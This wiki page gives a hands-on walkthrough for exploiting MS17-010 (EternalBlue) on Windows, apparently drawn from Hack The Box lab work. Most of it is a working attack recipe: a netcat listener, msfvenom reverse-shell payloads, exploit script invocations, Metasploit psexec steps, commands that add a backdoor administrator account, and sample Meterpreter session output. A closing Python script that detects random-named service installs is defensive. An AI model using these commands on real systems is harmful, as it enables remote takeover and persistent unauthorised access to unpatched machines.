
ms17_010 _cve2017_0143

lethanhtung01011980 edited this page Apr 13, 2020 · 15 revisions

MS17-010 - CVE-2017-0143 - For Windows

Manual exploit when a named pipe was found

Steps:

Create reverse shell listener:

  • nc -nlvp 5678

Get System shell:

  • cd MS17-010
  • python send_and_execute.py victim_ip ../revShell-winx86_p5678.exe (revShell-winx86_p5678.exe is a reverse shell executable generated by msfvenom)

Add admin user:

Ref:

Manual exploit when no named pipe is found

Ref: https://wiki.jacobshodd.com/writeups/hack-the-box/blue

This is for Windows 7 64-bit.

  • cd MS17-010/shellcode
  • nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
  • msfvenom -p windows/x64/shell_reverse_tcp -f raw -o revshell64_10101040.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=6789
  • cat eternalblue_kshellcode_x64.bin revshell64_10101040.bin > 10.10.10.40.payload.bin
  • nc -nlvp 6789
  • python eternalblue_exploit7.py 10.10.10.40 shellcode/10.10.10.40.payload.bin
  • You now have a SYSTEM shell.

Meterpreter

  • Check for SMB vulnerabilities with nmap -p 139,445 --script=smb-vuln* victim_ip
  • msfconsole
  • search ms17-010

Check the chance of success:

  • use auxiliary/admin/smb/ms17_010_command
  • set RHOSTS victim_ip
  • run

Exploit. You may need to run this to open a dummy RDP session if you get a LoginError timeout:

  • rdesktop victim_ip

Steps

  • use windows/smb/ms17_010_psexec
  • show options
  • set RHOST victim_ip
  • run
  • getsystem (escalate; may not be needed)
  • getuid (show current privilege; may not be needed)
  • sessions 1 (may not be needed)
  • shell
  • C:\WINNT\system32>net user newuser newpass /add
  • C:\WINNT\system32>net localgroup administrators newuser /add
  • rdesktop -u newuser -p newpass victim_ip (you may need to run this to open a dummy RDP session if you get a LoginError timeout)

Sample output

  • [*] Started reverse TCP handler on attacker_ip:4444
  • [*] victim_ip:445 - Target OS: Windows 5.0
  • [*] victim_ip:445 - Filling barrel with fish... done
  • [*] victim_ip:445 - <---------------- | Entering Danger Zone | ---------------->
  • [*] victim_ip:445 - [*] Preparing dynamite...
  • [*] victim_ip:445 - [*] Trying stick 1 (x86)...Boom!
  • [*] victim_ip:445 - [+] Successfully Leaked Transaction!
  • [*] victim_ip:445 - [+] Successfully caught Fish-in-a-barrel
  • [*] victim_ip:445 - <---------------- | Leaving Danger Zone | ---------------->
  • [*] victim_ip:445 - Reading from CONNECTION struct at: 0x817e39f0
  • [*] victim_ip:445 - Built a write-what-where primitive...
  • [+] victim_ip:445 - Overwrite complete... SYSTEM session obtained!
  • [*] victim_ip:445 - Selecting native target
  • [*] victim_ip:445 - Uploading payload... BTVbzIuF.exe
  • [*] victim_ip:445 - Created \BTVbzIuF.exe...
  • [+] victim_ip:445 - Service started successfully...
  • [*] Sending stage (179779 bytes) to victim_ip
  • [*] victim_ip:445 - Deleting \BTVbzIuF.exe...
  • [*] Meterpreter session 1 opened (attacker_ip:4444 -> victim_ip:1157) at 201x-xx-xx 01:15:31 -0400

Ref: https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/
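The sample output above shows the psexec module uploading an eight-letter random binary (BTVbzIuF.exe), starting it as a service and deleting it again; that service install is the artifact a defender can hunt for. The following detection script is an added example, not part of this wiki or the MS17-010 repository; the log lines are constructed, and the key=value export layout is an assumption (Event ID 7045 is the real Windows "service was installed" event).

```python
import re

# Constructed sample lines modelled on Windows System log Event ID 7045
# ("A service was installed in the system"); the key=value layout is an
# assumed SIEM export, not a real Windows export format.
SAMPLE_EVENTS = [
    r"EventID=7045 ServiceName=BTVbzIuF ImagePath=C:\Windows\BTVbzIuF.exe Account=LocalSystem",
    r"EventID=7045 ServiceName=WinDefend ImagePath=C:\Program Files\Windows Defender\MsMpEng.exe Account=LocalSystem",
    r"EventID=7045 ServiceName=Sysmon64 ImagePath=C:\Windows\Sysmon64.exe Account=LocalSystem",
    r"EventID=7036 ServiceName=BTVbzIuF State=running",
]

# key=value pairs where a value may contain spaces (e.g. "Program Files")
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
# Eight letters, no digits, mixed case: the shape of the generated payload
# name seen in the sample output above (BTVbzIuF.exe).
RANDOM_STEM_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{8}$")


def parse_event(line):
    """Split one key=value export line into a dict."""
    return {key: value for key, value in FIELD_RE.findall(line)}


def image_stem(image_path):
    """Return the file name without its .exe extension from a Windows path."""
    base = image_path.replace("/", "\\").rsplit("\\", 1)[-1]
    return base[:-4] if base.lower().endswith(".exe") else base


def is_random_named_install(event):
    """True for a service-install event whose binary has a generated-looking name."""
    if event.get("EventID") != "7045":
        return False
    return bool(RANDOM_STEM_RE.match(image_stem(event.get("ImagePath", ""))))


def find_suspicious_installs(lines):
    """Return (service name, image path) for every install worth alerting on."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_random_named_install(event):
            hits.append((event.get("ServiceName", ""), event["ImagePath"]))
    return hits


if __name__ == "__main__":
    for name, path in find_suspicious_installs(SAMPLE_EVENTS):
        print(f"ALERT: service {name} installed from random-looking binary {path}")
```

The name heuristic alone will produce some false positives, so pair it with the short-lived-binary pattern (file created, service started, file deleted within seconds) before treating a hit as confirmed.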
